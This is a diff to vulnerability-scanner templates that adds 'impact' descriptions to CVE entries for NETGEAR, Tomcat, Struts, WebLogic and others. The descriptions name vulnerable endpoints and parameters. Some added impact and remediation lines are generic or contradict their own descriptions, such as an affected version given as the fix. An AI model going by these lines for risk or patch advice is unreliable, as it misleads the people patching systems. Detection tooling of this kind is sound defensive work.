@@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to unauthorized access, data theft, or network compromise. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 0b8c45c132..2d66191540 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system. remediation: | Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 85a381cfe0..fa9d1fdc9c 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the appliance. remediation: | Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 5c7fa948d1..cdf13edcfd 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials. + impact: | + An attacker can gain unauthorized access to the camera and potentially control its functions. remediation: | Upgrade to the latest version of the firmware provided by Sony. reference: diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 2111491153..14e720711a 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser. remediation: | Upgrade SPIP to version 3.1.2 or later to mitigate this vulnerability. reference: 
diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 418bd7fa36..2791bb4d20 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Aruba Airwave to version 8.2.3.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 4b7ad2f80b..eef3c268db 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -5,6 +5,8 @@ info: author: charanrayudu,meme-lord severity: high description: DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources. + impact: | + An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. remediation: | Upgrade DotNetNuke (DNN) ImageHandler to version 9.2.0 or above. reference: diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index ebcbd705c9..d5b896c7ca 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server. reference: diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 477dfd6a64..8bed85367b 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 contain an open redirect vulnerability, which may result in phishing or social engineering attacks. + impact: | + An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks. remediation: | Apply the latest security patches or upgrade to a patched version of the Phoenix Framework. reference: diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 9ad45c4d70..07d183224d 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree. + impact: | + Allows an attacker to include arbitrary local files, potentially leading to unauthorized access or code execution. remediation: | Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor. reference: diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index a9d270e957..46c41f85df 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -5,6 +5,8 @@ info: author: Moritz Nentwig severity: critical description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application. reference: diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 078cf3897b..f8b0c67682 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches provided by Oracle to fix this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 84e7654a49..fec01e0de5 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server. remediation: | Apply the latest security patches provided by Oracle to fix this vulnerability. Additionally, restrict network access to the WebLogic server and implement strong authentication mechanisms. reference: diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index ae7fc212db..c7db92c16e 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080. + impact: | + The vulnerability allows an attacker to include local files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a patched version of Yaws or apply the necessary security patches. reference: diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index efe49f232d..2dc7da491f 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive data, potentially compromising the confidentiality of the system. remediation: | Apply the latest firmware update provided by the vendor to mitigate the information disclosure vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 8dd23f10e7..68d9f39bc4 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: "Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array." + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Upgrade Subrion CMS to version 4.1.5.10 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 25bbeab7c3..b77be7675f 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: | Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches. reference: diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index be88124dd2..eecc4aedfa 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade to FineCMS version 5.0.9 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index 12f7e1eced..7f33905f06 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -5,6 +5,8 @@ info: author: notnotnotveg severity: high description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or disable the XML-RPC server if not required. reference: diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 8cb7b988bd..dd868626fe 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of FineCMS (>=5.0.11) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index c7d018d096..f7b0f52e06 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Apply the latest security patch or upgrade to a newer version of XOOPS Core to fix the open redirect vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 74cefe700e..9823a75bd1 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml 
@@ -5,6 +5,8 @@ info: author: fopina,s0obi severity: critical description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected server. remediation: | Apply the latest security patches and updates provided by Jboss to fix this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index bbfbfc573c..e2624af724 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index d56380cb90..72058b633c 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml 
@@ -5,6 +5,8 @@ info: author: divya_mudgal severity: medium description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: | Apply the latest security patches or updates provided by HPE to fix the XSS vulnerability in the System Management software. reference: diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index b8f4e8a471..808461ef44 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index cc48a8b7fb..f465636628 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks. + impact: | + Remote code execution remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 2a60275827..d9b0ac58e4 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat. reference: diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 39dfd84822..46f4ad1ad5 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server. remediation: | Upgrade to Apache Tomcat version 7.0.80 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index ed3861af9b..6cdc71ef77 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr. + impact: | + Successful exploitation of this vulnerability could lead to information disclosure, denial of service. remediation: | Upgrade to a patched version of Apache Solr (7.2 or higher) or apply the recommended security patches. reference: 
diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 01abe6a5ba..9d6bbaa1c7 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. + impact: | + Remote attackers can exploit this vulnerability to escalate privileges. remediation: | Upgrade Apache CouchDB to version 2.1.1 or later. reference: diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 34fec57bb8..8cb7c91893 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml 
@@ -5,6 +5,8 @@ info: author: apt-mirror severity: high description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access, data leakage, and potential system compromise. remediation: | Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5. reference: diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 7e516b6081..f249cd367e 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project. reference: diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index f3fcb3fe1c..7af3c3bf9e 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml 
@@ -5,6 +5,8 @@ info: author: alph4byt3 severity: critical description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or upgrade to a patched version of OpenDreambox. reference: diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 1260cbe409..6ffe76e57b 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement. remediation: | Apply the latest security patches or firmware updates provided by Fortinet to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index c9e3fe61d8..0ae3ae256d 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. reference: diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 16a0c99bb3..6e9dc60afe 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Upgrade to a patched version of Trixbox or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 71a5818719..926f5239c4 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server. remediation: | Apply the latest security patches or upgrade to a newer version of Trixbox to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 5df9103dca..9a32849e9b 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update the WordPress 2kb Amazon Affiliates Store plugin to version 2.1.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 45ebd5741d..59d9f20f2b 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml 
@@ -5,6 +5,8 @@ info: author: mass0ma severity: medium description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of WSO2 Data Analytics Server or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 1d1f18c262..b252f9e924 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -5,6 +5,8 @@ info: author: Random_Robbie severity: high description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to ".." handling is incompatible with the pathname validation used by unspecified community modules. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade Node.js to version 8.6.0 or higher to mitigate the vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 8a2b4e34ac..ec08870f2d 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks. reference: diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 654d4a1ba0..2257795949 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter. + impact: | + The vulnerability allows an attacker to include local files, potentially leading to unauthorized access or code execution. remediation: | Update to the latest version of Restler and TYPO3 to fix the vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 6bc0c78bdc..9d6cedc3c9 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml 
